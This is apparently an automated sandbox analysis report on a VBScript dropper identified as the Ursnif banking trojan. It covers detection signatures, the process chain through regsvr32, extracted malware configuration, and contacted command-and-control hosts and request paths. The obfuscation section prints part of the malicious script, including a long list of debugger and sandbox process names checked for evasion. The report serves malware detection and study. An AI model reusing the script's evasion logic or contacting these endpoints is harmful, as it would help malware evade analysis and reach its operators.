
Analysis Report news#_29621.vbs

Overview

General Information

Sample Name: news#_29621.vbs
MD5: 22f41f6a07960e8a8c51009f1ef1a845
SHA1: 0368db6cdf586dcbd87f00d2704cc14ee19124b9
SHA256: dc673aa6fd93c29a7539571cd3425cde4a2965da40f778c6e5f29cac49045ecf

Errors
  • Sigma syntax error: One detector has no map or list, Rule: Suspicious XOR Encoded PowerShell Command Line
  • Sigma syntax error: One detector has no map or list, Rule: Suspicious PowerShell Parent Process

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • wscript.exe (PID: 5512 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\news#_29621.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 5668 cmdline: regsvr32 C:\Users\user\AppData\Local\Temp\pristine.diff MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5680 cmdline: C:\Users\user\AppData\Local\Temp\pristine.diff MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 4256 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5036 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4256 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250151", "uptime": "338", "system": "408d339fa6feb5d11ab15c0b00016768", "size": "0", "crc": "1", "action": "00000000", "id": "3300", "time": "1593541998", "user": "31b341dd54c8a3b79c4b2eb57edb75be", "hash": "0x00000000", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Local\Temp\pristine.diff, CommandLine: C:\Users\user\AppData\Local\Temp\pristine.diff, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 C:\Users\user\AppData\Local\Temp\pristine.diff, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 5668, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\pristine.diff, ProcessId: 5680

            Signature Overview


AV Detection:

Found malware configuration
Source: regsvr32.exe.5680.3.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250151", "uptime": "338", "system": "408d339fa6feb5d11ab15c0b00016768", "size": "0", "crc": "1", "action": "00000000", "id": "3300", "time": "1593541998", "user": "31b341dd54c8a3b79c4b2eb57edb75be", "hash": "0x00000000", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: cdn.arsis.at | Virustotal: Detection: 10%
Source: 2no.co | Virustotal: Detection: 6%
Source: https://2no.co/ | Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: news#_29621.vbs | Virustotal: Detection: 28%
Source: news#_29621.vbs | ReversingLabs: Detection: 25%
Source: 3.2.regsvr32.exe.10000000.2.unpack | Avira: Label: TR/Crypt.XPACK.Gen8

Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_007B9673 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_007B9673
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: Joe Sandbox View | IP Address: 88.99.66.31
Source: Joe Sandbox View | IP Address: 88.99.66.31
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic | HTTP traffic detected: GET /api1/oNfDCFjsmK/Rz7c_2F4HvcZGT1UO/hYlOIGMBBBfj/jCyweCeg9Td/V4Jdgz4PeDxybI/DpYXEDmbXgB5dW_2FAye2/oUJclJiKLyLVmwuC/OtQZKsq_2BQfPsi/FHxIVm6eYFq10sCQW9/KcXAQ4JEw/lbIG73IByxcR0zSY26mY/BeLa_2BQ48sYYvIJmwB/Y3nm6BXVPzClvCr30q_2Br/oYa5C1vjCsCmP/JA8WJuye/6b_2Br6_2FhZaIYSLhIPB_2/FpRFgZpVGq/MA0TRM5gw0_0A_0DP/5apJruSBVrXP/hhq63GirVkl/ZaKhgcV_2BlckE/7jtXlG_2F_2FSNj9dtZVK/HEKex5OFh85rp/sO HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: cdn.arsis.at | Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: 2no.co
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 30 Jun 2020 09:33:22 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip | Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
Source: wscript.exe, 00000000.00000003.804138417.0000021590380000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: wscript.exe, 00000000.00000003.804520999.0000021593B79000.00000004.00000001.sdmp | String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: wscript.exe, 00000000.00000003.804520999.0000021593B79000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.804138417.0000021590380000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.804138417.0000021590380000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: wscript.exe, 00000000.00000003.804138417.0000021590380000.00000004.00000001.sdmp | String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: wscript.exe, 00000000.00000003.804520999.0000021593B79000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: wscript.exe, 00000000.00000003.800576234.0000021595E61000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.837207713.0000021595ED7000.00000004.00000001.sdmp | String found in binary or memory: https://2no.co/
Source: wscript.exe, 00000000.00000002.852359516.00000215922E8000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.851902509.000002159221A000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.836507336.0000021593B5C000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.853821826.0000021593B46000.00000004.00000001.sdmp | String found in binary or memory: https://2no.co/1vXQd7
Source: wscript.exe, 00000000.00000003.837628270.0000021596E60000.00000004.00000001.sdmp | String found in binary or memory: https://2no.co/1vXQd7O
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174179348.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174074557.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1173922925.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5680, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174179348.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174074557.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1173922925.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5680, type: MEMORY

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_1000177C NtMapViewOfSection,3_2_1000177C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_100011C7 GetProcAddress,NtCreateSection,memset,3_2_100011C7
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10002785 NtQueryVirtualMemory,3_2_10002785
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_007B1884 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_007B1884
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_007BB085 NtQueryVirtualMemory,3_2_007BB085
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10002564 3_2_10002564
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_007BAE64 3_2_007BAE64
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_007B1D72 3_2_007B1D72
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10011700 3_2_10011700
Source: news#_29621.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: classification engine | Classification label: mal100.bank.troj.evad.winVBS@7/8@2/2
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\news#_29621.vbs'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: news#_29621.vbs | Virustotal: Detection: 28%
Source: news#_29621.vbs | ReversingLabs: Detection: 25%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\news#_29621.vbs'
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\Users\user\AppData\Local\Temp\pristine.diff
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\Temp\pristine.diff
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4256 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\Temp\pristine.diff
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4256 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Source: Binary string: c:\colony\energy\Difficult\rose\instrument\baby\Laugh.pdb | source: wscript.exe, 00000000.00000003.791857071.0000021592207000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1190556934.0000000010013000.00000002.00020000.sdmp, pristine.diff.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell")REM lemur chic brokerage Burt. 7956037 flunk tomahawk bastion form cypress. sukiyaki. Jerusalem, Monoceros sequitur slave juxtapose adduce Bismarck orchestral mortify serendipitous. Jarvin forsaken Adirondack emphatic misanthrope sideman argon illegible doorbell allay plus Remington Dim NUEc: Set NUEc = CreateObject("Scripting.FileSystemObject")If (NUEc.FileExists(CT + "microsoft.url")) ThenaEZlCZuWScript.QuitElseWith fiefdom.createShortcut(CT + "adobe.url")' scrotum Emery Sylow Sonora wolf volcano juggernaut pyridine simplectic Wyman, 2338391 nematocyst scoria abode Nehru threadbare rumble levy bluejacket aperiodic riot Enos synopses visitation mangrove .TargetPath = "https://adobe.com".Save()End WithEnd IfEnd FunctionFunction architectonic()on error resume nextIf (InStr(WScript.ScriptName, cStr(252438523)) > 0 And Pv = 0) ThenREM vend roar slave759 Malagasy. susceptance allergy pip partition predicate clank Presbyterian bode gad, slunk113 sesame. Niger Marin Boreas Manitoba nudge southbound insolate astonish colloidal customhouse. gemsbok Clausen. 3848977 ache Deane flirt typographer beggar Barney Exit FunctionEnd If' snip hickory. anybody. tramp streptomycin Boca stony taunt peck cantor, bibliophile Armenia, 6871909 penumbra lingo Kerrproc = (90 + (-((1464 - 8.0) - (1371 - 5.0))))Sinai = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","r
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10002500 push ecx; ret 3_2_10002509
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10002553 push ecx; ret 3_2_10002563
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_007BAE53 push ecx; ret 3_2_007BAE63
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_007BAB20 push ecx; ret 3_2_007BAB29

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\pristine.diff
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\pristine.diff

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174179348.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1174074557.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1173922925.0000000005238000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5680, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\news#_29621.vbs
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.770714232.00000215922DC000.00000004.00000001.sdmp | Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE{
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@7
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: SYSER.EXE=
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXE@A
